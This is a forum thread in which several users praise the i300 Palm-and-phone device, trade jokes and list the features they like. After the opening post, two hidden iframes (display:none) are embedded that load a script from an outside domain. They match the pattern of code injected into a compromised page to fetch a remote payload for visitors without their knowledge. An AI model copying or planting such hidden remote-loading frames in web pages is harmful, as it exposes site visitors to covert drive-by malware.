+ Reply to Thread

Just a Cool Toy...?

Hey guys -

Lots of people out there are mentioning how they great the i300 is since it's the latest and greatest tech/ toy. But, the i300 is so much more than that.

I was an early adopter for the orig Qualcomm q phone and ended up selling it 6 weeks later on ebay (for a $300 loss, thank you), since it just didn't cut it. That was a true epitemy of a first realease - big and barely getting a phone and palm integrated together.

The i300 is so well designed, intelligently integrated, and extremely compact that it is the first EVER to actually do a GREAT job of integrating Palm + Phone. We've all been reading about the potential for Palm and Phone to integrate, and it's finally arrived.

Sure, it's always nice to have the best/ newest/ most hip/ blah blah blah, but I don't want to belittle the i300 as only that. It is a great phone and they got it right. It's undeniable and I'll defend that any day.

OK. I'm done now. back to work. Thanks.
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Cliff

agreed.

Cliff,

That's all fine and dandy (I can't believe I just used the word "dandy"), but can't you get off the fence for once and tell us what you think? Geez!

Craig
    I thought grafitti was illegal?

Originally posted by csherman
    Cliff,

That's all fine and dandy (I can't believe I just used the word "dandy"), but can't you get off the fence for once and tell us what you think? Geez!

Craig
    Thanks Craig - my counselor told me this will help with my therapy.... Come to think of it, my counselor looks an awful lot like my wife... I gotta check into that....
    Cliff

Thanks Cliff. Its really refreshing to hear praise for this awesome piece of craftmanship!

No kiddin'. This is much more than just a cool toy (though it's that, too -- it's just about the ultimate geek god accessory at the moment).

In addition to nearly perfect palm/phone integration (yeah, yeah, there's a couple things that aren't quite right, but they're trivial in comparison to the things that are) the added touches: crisp, backlit color display: read eBooks in bed at night! (Try that with the ghastly inverted backlighting of the monochrome palms.) The handy voice recorder that doesn't cut into free memory. The onboard voice dialling -- quick and responsive, no going through Sprint and paying airtime charges to use a similar feature. The little top display, the flawlessly responsive and accurate touchscreen... I could go on for hours. I've had it for a month and a half and I still can't get over what an awesome little device it is.

I have very high expectations and am usually disappointed at the number of dropped balls and missed opportunities in devices like this. But they got it so damn right this time.

(If only they could have dispensed with the unbelievably idiotic d/a/d/a/d conversion that results in a mere 14.4k data rate. But that's nothing Samsung could have controlled if they'd wanted to.)